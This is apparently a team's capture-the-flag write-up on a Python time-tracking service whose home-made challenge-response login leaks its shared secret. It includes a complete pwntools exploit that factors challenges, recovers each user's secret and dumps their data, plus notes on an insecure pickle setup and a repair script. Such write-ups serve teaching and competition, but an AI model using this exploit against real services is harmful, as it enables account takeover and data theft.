Saarsec

saarsec

Schwenk and pwn

CInsects CTF 2022 - commercialtimetracker

commercialtimetracker is a Python service for tracking work times, based on gevent. It contained a custom, hash-based authentication method that was flawed, allowing attackers to recover the authentication secret.

This service was part of the CInsects CTF 2022. We exploited this pretty early in the CTF - actually we were sitting on a working exploit for over an hour, until checkers and flag submission we up. Unfortunately the service was broken for many teams, so we didn’t get many flags out of this exploit.

Service Overview

The service employed a custom, line-based protocol. The server starts a connection by sending CTT EHLO, clients respond with CTT EHLO, then the connection is accepting commands. The following commands are possible:

Data was stored in pickle’d files, named by the user’s identifier, but serialization was not exploitable (details at the end).

The interesting part was the login implementation, which was a challenge-response scheme with proof-of-work included: On registration, server and client share a large number, the shared secret. On login, the server generates two numbers. The client then searches for two other numbers that make hash(<secret>-<challenge>-<n>) start with 0000 (hex). The client responds with the two numbers and the full hashes for verification.

The exact implementation was:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import hashlib
import sys
from collections import namedtuple
from random import SystemRandom

from sympy import nextprime as abs

ClientAccountInfo = namedtuple('ClientAccountInfo', ('client_identifier', 'shared_secret', 'nickname'))
ChallengeChallenge = namedtuple('ChallengeChallenge', ('challenge1', 'challenge2'))
ChallengeResponse = namedtuple('ChallengeResponse', ('i', 'response1', 'j', 'response2'))


class BaseConsoleFoobarCommercialInnovativeProcess:
    def _write_line(self, message):
        if hasattr(self, 'sock'):
            self.sock.sendall(message.encode() + b'\n')
        else:
            sys.stdout.write(message + '\n')
            sys.stdout.flush()

    @staticmethod
    def _generate_challenge(shared_secret: int) -> ChallengeChallenge:
        """
        Generate a super secret secret for this top secure military-grade
        challenge-response-challenge-response authentication.
        This uses two challenges and responses (that are both transferred simultaneously
        for performance reasons). Obviously, when doing two challenge-response pairs,
        the system is even more unbreakable than with only a single challenge.
        We may extend this with a third challenge-response in a future version
        to make it even more unbreakable.
        """
        rand = abs(SystemRandom().randint(10800, 3542000002))
        rand2 = abs(SystemRandom().randint(10800, 3542000002))
        # multiply with the shared secret to have user-specific challenges. This is really imporant for security!!!
        #  And of course it absolutely makes sense.
        challenge1 = shared_secret * rand
        challenge2 = abs(challenge1 + 42 * rand2)
        # add some random noise!
        challenge1 += challenge2
        return ChallengeChallenge(challenge1, challenge2)

    @staticmethod
    def _verify_response(account_info: ClientAccountInfo, challenge: ChallengeChallenge,
                         response: ChallengeResponse) -> bool:
        if not response.response1[:4] == response.response2[:4] == 4 * '0':
            return False
        hash1 = hashlib.blake2b(
            f'{account_info.shared_secret}-{challenge.challenge1}-{response.i}'.encode()).hexdigest()
        hash2 = hashlib.blake2b(
            f'{account_info.shared_secret}-{challenge.challenge2}-{response.j}'.encode()).hexdigest()
        return hash1 == response.response1 and hash2 == response.response2

Vulnerability

The challenges are generated based on the secret and two random primes and . Note that abs is patched to sympy.nextprime. Prime size was (at most) 32 bits, secret size was a bit larger, and there is no modulo arithmetic - python’s numbers are of arbitrary size. Then challenges and were generated:

Only was sent to the client. But from these challenges, we can recover the shared secret . After receiving one challenge, we recompute . We factorize , which is simple because it’s less than 100bits. From these factors, one is , the remaining ones are from . We could now guess which factor was , or request a second challenge: factors from also divide the second , only does not divide . After having recovered which is the product of the remaining factors, we can restart the authentication and create a valid response.

Exploit

Our exploit literally follows the vulnerability description. We first get a list of all user identifiers with the LIST command. For each user, we request two challenges. We factorize the first one, and use the second one to test the factors. We used the first StackOverflow result for a factorization algorithm, which was not perfect, but good enough. Because we didn’t have checker traffic on our service when writing the exploit, we did not know the size of the gameserver’s secrets, so we prepared a second factorization function based on yafu. After having cracked a secret, we log in and retrieve all times, which contain the flags.

import json
import multiprocessing
import os
import sys
from typing import List

import redis
import requests

os.environ['PWNLIB_NOTERM'] = '1'

from pwn import *

from math import gcd

def factorization(n):
    factors = []
    def get_factor(n):
        x_fixed = 2
        cycle_size = 2
        x = 2
        factor = 1
        while factor == 1:
            for count in range(cycle_size):
                if factor > 1: break
                x = (x * x + 1) % n
                factor = gcd(x - x_fixed, n)
            cycle_size *= 2
            x_fixed = x
        return factor
    while n > 1:
        next = get_factor(n)
        factors.append(next)
        n //= next
    return factors


def factor_yafu(n: int) -> List[int]:
    output = subprocess.check_output(['./yafu', f'factor({n})']).decode()
    if '***factors found***' in output:
        factors = re.findall(r'P\d+ = (\d+)', output)
        return [int(f) for f in factors]
    return []


REDIS_HOST = "127.0.0.1"

def redisget(key, content_type=set):
    rconn = redis.Redis(host=REDIS_HOST)
    raw_data = rconn.get(key)
    if raw_data is None:
        return content_type()
    try:
        data = json.loads(raw_data)
        if not isinstance(data, content_type):
            return content_type(data)
        return data
    except:
        return content_type()


def redisset(key, value):
    if isinstance(value, set):
        value = list(value)
    rconn = redis.Redis(host=REDIS_HOST)
    rconn.set(key, json.dumps(value))


# copied from the provided client.py
def generate_response(shared_secret: int, challenge1, challenge2):
        i = 0
        while True:
            hash1 = hashlib.blake2b(f'{shared_secret}-{challenge1}-{i}'.encode()).digest()
            if all(b == 0 for b in hash1[:2]):
                break
            i += 1
        j = 0
        while True:
            hash2 = hashlib.blake2b(f'{shared_secret}-{challenge2}-{j}'.encode()).digest()
            if all(b == 0 for b in hash2[:2]):
                break
            j += 1
        return [str(i), hash1.hex(), str(j), hash2.hex()]


def exploit(target: str):
    # 1. get a list of user idents
    conn = remote(target, 7777, timeout=7)
    print(conn.recvline())
    conn.sendline(b'CTT EHLO')
    print(conn.recvline())
    conn.sendline(b'LIST')
    idents = conn.recvline().decode().strip().split(' ')[1:]
    print(idents)
    conn.sendline(b'BYE')
    conn.close()

    # redis check so that we don't attack users twice
    seen_idents = redisget(f'commercialtt_idents:{target}')
    print(seen_idents)
    print(set(idents) - seen_idents)

    for ident in idents:
        if ident in seen_idents:
            continue
        # 2. retrieve challenges
        print('NEW IDENT', ident, '...')
        conn = remote(target, 7777)
        conn.recvline()
        conn.sendline(b'CTT EHLO')
        conn.recvline()
        conn.sendline(b'LOGIN '+ident.encode())
        values = conn.recvline()
        conn.sendline(b'RESPONSES 0 0 0 0')
        conn.recvline()
        _, _, a, b = values.strip().split()
        ab = int(a.decode()) - int(b.decode())  # this is c0
        print('factoring ', ab, '...')
        ts = time.time()
        results = factorization(ab)
        #results = factor_yafu(ab)
        ts = time.time() - ts
        print('FACTORS', results, 'in', ts, 'seconds')

        # 3. retrieve second challenges
        conn.recvline()
        conn.sendline(b'LOGIN ' + ident.encode())
        values = conn.recvline()
        print(values)
        conn.sendline(b'RESPONSES 0 0 0 0')
        print(conn.recvline())
        _, _, a, b = values.strip().split()
        ab = int(a.decode()) - int(b.decode())  # this is c0'
        results2 = [r for r in results if (ab) % r == 0]  # filter the random factor out
        print('FACTORS SURVIVED:', results2)
        secret = 1
        for r in results2:
            secret *= r
        print('SECRET =', secret)  # recovered secret
        conn.sendline(b'BYE')
        conn.close()

        # 4. login with recovered secret (on new connection)
        conn = remote(target, 7777)
        conn.recvline()
        conn.sendline(b'CTT EHLO')
        conn.recvline()
        conn.sendline(b'LOGIN ' + ident.encode())
        values = conn.recvline()
        print(values)
        _, _, a, b = values.strip().split()
        responses = generate_response(secret, int(a.decode()), int(b.decode()))
        print('RESPONSES ' + ' '.join(str(r) for r in responses))
        conn.sendline(('RESPONSES ' + ' '.join(str(r) for r in responses)).encode())
        print(conn.recvline())
        # 5. retrieve all stored times
        conn.sendline(b'TIMES')
        conn.sendline(b'BYE')
        print(conn.recvall(timeout=3))

        seen_idents.add(ident)
        redisset(f'commercialtt_idents:{target}', seen_idents)  # don't exploit this user next time


if __name__ == '__main__':
    exploit('127.0.0.1' if len(sys.argv) < 2 else sys.argv[1])

Fixes

The fix was simple: the secret is not necessary for challenge generation, the algorithm works independent of the chosen challenge numbers. We can replace it by some constant. In our case we patched line 36 to challenge1 = 0x1337 * rand.

An Unexploitable Vulnerability?

Data was stored in pickle’d files, named by the user’s identifier. The read and write logic was almost vulnerable: First, the code to unpickle was in theory vulnerable to a deserialization attack:

pickle.secure_dump = pickle.dump
pickle.secure_load = pickle.load
pickle.UnpicklingMayBeInsecure = pickle.UnpicklingError

# ...

try:
    return pickle.secure_load(file)
except pickle.UnpicklingMayBeInsecure:
    return None

The code was pretending to use secure versions of pickle, but the redefinitions at the top of the file redefined them to the insecure variants. To get a deserialization attack working, one would need attacker-provided input. We could store files on disk using another service (securestorage), but would then need a path traversal attack. The path of the input file was checked like this (key is attacker-provided):

path = (DATABASE / key).resolve().absolute()
assert '/' not in path.relative_to(DATABASE).as_posix()
assert '.' not in path.as_posix()

If one would start a path traversal attack against this code (key='../../xyz'), resolve() would re-build the path without ../, so the '.' not in check is trivially bypassed. However, the relative_to method raises an exception if the new path is not relative to the database path, making the vulnerability unexploitable.

We’re not sure if this was an intended, but broken vulnerability, or if this was just trolling.

Repairing the service

Unfortunately, the service was broken in multiple ways on the vulnbox. While the organizers claimed to have fixes deployed at some point, the service was still not working. Luckily, it was installed on the one (out of three) vulnboxes where we had access to, so we patched it ourselves. Three things needed attention:

  1. The service was not initialized. While a init.sh script was available, it was never called.
  2. The service was lacking dependencies, sympy was not installed. Unfortunately, the vulnbox had no internet access, so we couldn’t use pip to simply install sympy. We solved this by downloading Debian’s packaged sympy and dependencies, move it to the vulnbox over ssh, and using dkpg to install it.
  3. The device which contained the database folder was behaving strange: when new files should be created, it responded with no space, although the device was almost empty. Editing existing files was still possible, even if these files got larger (assuming one would install a text editor). We fixed this by moving the database folder to a different partition.

We also published these patches on IRC in the hope to get some exploitable targets up, but at this point, many teams were already inactive. Having only a few targets to exploit, our attack did not give as many flags as desired.

We published this patch script in IRC:

# run locally, replace "vulnbox" with your SSH config name
wget 'http://ftp.de.debian.org/debian/pool/main/m/mpmath/python3-mpmath_1.2.1-1_all.deb'
wget 'http://ftp.de.debian.org/debian/pool/main/s/sympy/python3-sympy_1.7.1-3_all.deb'
scp python3-mpmath_1.2.1-1_all.deb python3-sympy_1.7.1-3_all.deb vulnbox:~/
ssh vulnbox 'dpkg -i ~/*.deb && /media/static/commercialtimetracker/init.sh && systemctl restart run@commercialtimetracker'
# run on vulnbox as root
cp /media/static/commercialtimetracker/server.py ~/server.py
sed "s|DATABASE = Path('_data').absolute()|DATABASE = Path('/home/commercialtimetracker/_data').absolute()|" ~/server.py > /media/static/commercialtimetracker/server.py
mkdir /home/commercialtimetracker/_data
chown commercialtimetracker /home/commercialtimetracker/_data
systemctl restart run@commercialtimetracker

Summary

Finally, this was a small but interesting service with a beginner-friendly vulnerability, for which we had an exploit rather fast.